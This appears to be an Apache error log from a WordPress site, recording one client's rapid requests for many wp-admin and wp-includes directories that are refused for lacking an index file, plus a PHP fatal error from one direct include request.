(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:16:15.143749 2024] [autoindex:error] [pid 32622:tid 140340019304192] [client 193.34.213.138:42718] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:16:20.272785 2024] [autoindex:error] [pid 762:tid 140339977340672] [client 193.34.213.138:42742] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:16:24.521797 2024] [autoindex:error] [pid 763:tid 140340172973824] [client 193.34.213.138:42752] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:16:36.016289 2024] [autoindex:error] [pid 921:tid 140339977340672] [client 193.34.213.138:42768] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:16:42.865464 2024] [autoindex:error] [pid 921:tid 140340052875008] [client 193.34.213.138:42780] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:17:24.700288 2024] [autoindex:error] [pid 763:tid 140340172973824] [client 193.34.213.138:42858] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:17:28.303936 2024] [autoindex:error] [pid 761:tid 140339943769856] [client 193.34.213.138:42866] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:17:38.047172 2024] [autoindex:error] [pid 921:tid 140339952162560] [client 193.34.213.138:42890] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:17:44.684211 2024] [autoindex:error] [pid 921:tid 140340069660416] [client 193.34.213.138:42908] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:17:50.711161 2024] [autoindex:error] [pid 921:tid 140340027696896] [client 193.34.213.138:42932] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:18:36.261719 2024] [autoindex:error] [pid 763:tid 140340044482304] [client 193.34.213.138:43026] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:18:38.901951 2024] [autoindex:error] [pid 761:tid 140340172973824] [client 193.34.213.138:43034] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:18:54.495016 2024] [autoindex:error] [pid 761:tid 140340052875008] [client 193.34.213.138:43064] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:19:02.004155 2024] [autoindex:error] [pid 2165:tid 140340164581120] [client 193.34.213.138:43090] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:19:12.606777 2024] [autoindex:error] [pid 2008:tid 140340027696896] [client 193.34.213.138:43162] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:19:19.970346 2024] [autoindex:error] [pid 2165:tid 140339960555264] [client 193.34.213.138:43170] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:19:30.111580 2024] [autoindex:error] [pid 2006:tid 140340181366528] [client 193.34.213.138:43184] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:19:40.045761 2024] [autoindex:error] [pid 2165:tid 140340036089600] [client 193.34.213.138:43194] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:19:41.468139 2024] [autoindex:error] [pid 2165:tid 140340156188416] [client 193.34.213.138:43198] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:19:51.786947 2024] [autoindex:error] [pid 2008:tid 140340147795712] [client 193.34.213.138:43202] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Cookie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:19:54.462859 2024] [autoindex:error] [pid 2006:tid 140340069660416] [client 193.34.213.138:43212] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:19:58.616038 2024] [autoindex:error] [pid 2007:tid 140339926984448] [client 193.34.213.138:43216] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:20:02.791819 2024] [autoindex:error] [pid 2165:tid 140340044482304] [client 193.34.213.138:43224] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:20:04.795292 2024] [autoindex:error] [pid 2165:tid 140340010911488] [client 193.34.213.138:43228] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Proxy/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:20:11.481464 2024] [autoindex:error] [pid 2008:tid 140340010911488] [client 193.34.213.138:43234] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Response/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:20:17.266241 2024] [autoindex:error] [pid 2165:tid 140339952162560] [client 193.34.213.138:43238] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:20:24.881326 2024] [autoindex:error] [pid 2165:tid 140339977340672] [client 193.34.213.138:43246] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Utility/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:20:31.821620 2024] [autoindex:error] [pid 2165:tid 140339943769856] [client 193.34.213.138:43250] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:20:37.141699 2024] [autoindex:error] [pid 2165:tid 140340069660416] [client 193.34.213.138:43260] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Cache/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:20:42.604199 2024] [autoindex:error] [pid 2006:tid 140340002518784] [client 193.34.213.138:43264] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:20:59.175220 2024] [autoindex:error] [pid 2165:tid 140340061267712] [client 193.34.213.138:43306] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Decode/HTML/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:21:05.733954 2024] [autoindex:error] [pid 2006:tid 140339985733376] [client 193.34.213.138:43342] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:21:10.995899 2024] [autoindex:error] [pid 2165:tid 140339968947968] [client 193.34.213.138:43346] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Net/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:21:16.050438 2024] [autoindex:error] [pid 2165:tid 140339935377152] [client 193.34.213.138:43350] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Parse/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:21:20.678001 2024] [autoindex:error] [pid 2007:tid 140340019304192] [client 193.34.213.138:43354] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/XML/Declaration/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:21:30.684792 2024] [autoindex:error] [pid 2165:tid 140339960555264] [client 193.34.213.138:43358] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:21:37.404250 2024] [autoindex:error] [pid 2165:tid 140339926984448] [client 193.34.213.138:43368] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:21:42.487836 2024] [autoindex:error] [pid 2165:tid 140340156188416] [client 193.34.213.138:43372] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:21:49.720154 2024] [autoindex:error] [pid 2165:tid 140340147795712] [client 193.34.213.138:43380] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:21:54.226007 2024] [autoindex:error] [pid 2165:tid 140340010911488] [client 193.34.213.138:43388] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:22:05.486641 2024] [autoindex:error] [pid 2165:tid 140339952162560] [client 193.34.213.138:43396] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:22:17.284660 2024] [autoindex:error] [pid 2008:tid 140339985733376] [client 193.34.213.138:43400] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:22:23.517156 2024] [:error] [pid 2008:tid 140340027696896] [client 193.34.213.138:43404] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Mon Sep 23 10:22:23.517484 2024] [:error] [pid 2008:tid 140340027696896] [client 193.34.213.138:43404] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Mon Sep 23 10:22:23.517763 2024] [:error] [pid 2008:tid 140340027696896] [client 193.34.213.138:43404] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Mon Sep 23 10:22:23.518033 2024] [:error] [pid 2008:tid 140340027696896] [client 193.34.213.138:43404] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Mon Sep 23 10:22:26.735717 2024] [autoindex:error] [pid 2165:tid 140339994126080] [client 193.34.213.138:43408] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/archives/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:22:34.287157 2024] [autoindex:error] [pid 2008:tid 140340147795712] [client 193.34.213.138:43412] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:22:38.663628 2024] [autoindex:error] [pid 2008:tid 140339943769856] [client 193.34.213.138:43420] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/block/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:22:46.607235 2024] [autoindex:error] [pid 2165:tid 140339943769856] [client 193.34.213.138:43424] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/button/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:22:49.128269 2024] [autoindex:error] [pid 2008:tid 140339994126080] [client 193.34.213.138:43428] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:22:53.467565 2024] [autoindex:error] [pid 2007:tid 140340172973824] [client 193.34.213.138:43436] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/calendar/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:22:59.591226 2024] [autoindex:error] [pid 2007:tid 140340069660416] [client 193.34.213.138:43446] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/categories/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:23:05.965947 2024] [autoindex:error] [pid 2007:tid 140340189759232] [client 193.34.213.138:43450] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/code/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:23:12.832097 2024] [autoindex:error] [pid 2165:tid 140340061267712] [client 193.34.213.138:43454] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/column/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:23:19.025423 2024] [autoindex:error] [pid 2008:tid 140340010911488] [client 193.34.213.138:43460] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/columns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:23:25.049893 2024] [autoindex:error] [pid 2006:tid 140340189759232] [client 193.34.213.138:43468] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/cover/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:23:39.343502 2024] [autoindex:error] [pid 2165:tid 140340002518784] [client 193.34.213.138:43484] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/embed/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:23:45.654088 2024] [autoindex:error] [pid 2165:tid 140339968947968] [client 193.34.213.138:43488] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/file/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 23 10:23:54.678619 2024] [autoindex:error] [pid 2165:tid 140339935377152] [client 193.34.213.138:43496] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/freeform/: No matching DirectoryIndex 